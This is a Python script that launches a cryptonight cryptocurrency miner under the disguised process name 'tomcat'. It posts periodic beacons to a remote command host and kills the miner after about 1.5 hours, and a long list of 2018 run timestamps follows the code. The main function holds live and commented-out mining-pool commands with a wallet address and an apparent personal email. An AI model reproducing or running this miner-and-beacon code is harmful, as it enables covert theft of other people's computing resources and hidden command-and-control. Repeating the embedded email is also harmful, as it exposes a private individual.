import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:24:03.715153
#2018-02-17 17:12:04.743809
#2018-02-17 19:00:08.477224
#2018-02-17 20:49:01.828911
#2018-02-17 22:36:01.443628
#2018-02-18 00:20:04.225837
#2018-02-18 02:10:08.561524
#2018-02-18 03:57:07.023753
#2018-02-18 05:46:06.339597
#2018-02-18 07:37:06.520629
#2018-02-18 09:25:05.883992
#2018-02-18 11:11:06.160687
#2018-02-18 12:58:04.356190
#2018-02-18 14:47:01.248222
#2018-02-18 16:35:06.920746
#2018-02-18 18:24:01.451101
#2018-02-18 20:09:05.831779
#2018-02-18 21:56:05.914413
#2018-02-18 23:45:07.423364
#2018-02-19 01:31:07.311079
#2018-02-19 03:19:05.935386
#2018-02-19 05:04:07.365951
#2018-02-19 06:49:08.486065
#2018-02-19 08:39:04.721482
#2018-02-19 10:28:06.886403
#2018-02-19 12:15:09.139987
#2018-02-19 14:03:09.222709
#2018-02-19 15:52:02.125137
#2018-02-19 17:39:10.946686
#2018-02-19 19:28:04.732869
#2018-02-19 21:17:04.522994
#2018-02-19 23:03:05.664536
#2018-02-20 00:46:04.175163
#2018-02-20 02:35:06.753241
#2018-02-20 04:24:05.440283
#2018-02-20 06:09:05.478989
#2018-02-20 07:54:01.964036
#2018-02-20 09:39:07.590703
#2018-02-20 11:23:01.544180
#2018-02-20 13:08:08.780184
#2018-02-20 14:53:04.504778
#2018-02-20 16:38:07.847061
#2018-02-20 18:24:01.307213
#2018-02-20 20:16:05.233706
#2018-02-20 22:01:07.138415
#2018-02-20 23:42:07.078630
#2018-02-21 01:26:05.671393
#2018-02-21 03:13:01.500330
#2018-02-21 05:00:04.579590
#2018-02-21 06:48:05.108941
#2018-02-21 08:36:01.803222
#2018-02-21 10:22:05.918151
#2018-02-21 12:10:06.718751
#2018-02-21 14:00:03.615454
#2018-02-21 15:46:08.620256
#2018-02-21 17:39:08.367529
#2018-02-21 19:24:09.096842
#2018-02-21 21:11:05.794194
#2018-02-21 22:58:04.241152
#2018-02-22 00:46:04.474181
#2018-02-22 02:34:05.591909
#2018-02-22 04:20:07.404730
#2018-02-22 06:06:07.321347
#2018-02-22 07:52:01.618702
#2018-02-22 09:40:04.973774
#2018-02-22 11:25:09.723993
#2018-02-22 13:10:01.514328
#2018-02-22 14:58:06.405381
#2018-02-22 16:44:05.106924
#2018-02-22 18:31:07.464270
#2018-02-22 20:23:06.488601
#2018-02-22 22:09:03.893753
#2018-02-22 23:55:05.802458
#2018-02-23 01:43:07.597059
#2018-02-23 03:32:04.746571
#2018-02-23 05:17:04.057346
#2018-02-23 07:03:07.406340
#2018-02-23 08:53:06.221860
#2018-02-23 11:14:08.084082
#2018-02-23 13:08:04.671572
#2018-02-23 14:52:08.450129
#2018-02-23 16:41:04.236107
#2018-02-23 18:28:07.352289
#2018-02-23 20:12:08.660715
#2018-02-23 22:00:09.092249
#2018-02-23 23:48:04.987972
#2018-02-24 01:34:02.106123
#2018-02-24 03:23:02.016671
#2018-02-24 05:08:07.071682
#2018-02-24 06:58:06.866848
#2018-02-24 08:49:03.590851
#2018-02-24 10:51:01.769664
#2018-02-24 12:38:07.012212
#2018-02-24 14:27:06.067218
#2018-02-24 16:15:09.456042
#2018-02-24 18:09:06.078538
#2018-02-24 19:56:01.996778
#2018-02-24 21:39:04.744240
#2018-02-25 00:29:01.563806
#2018-02-25 04:26:03.964191
#2018-02-25 08:07:04.527335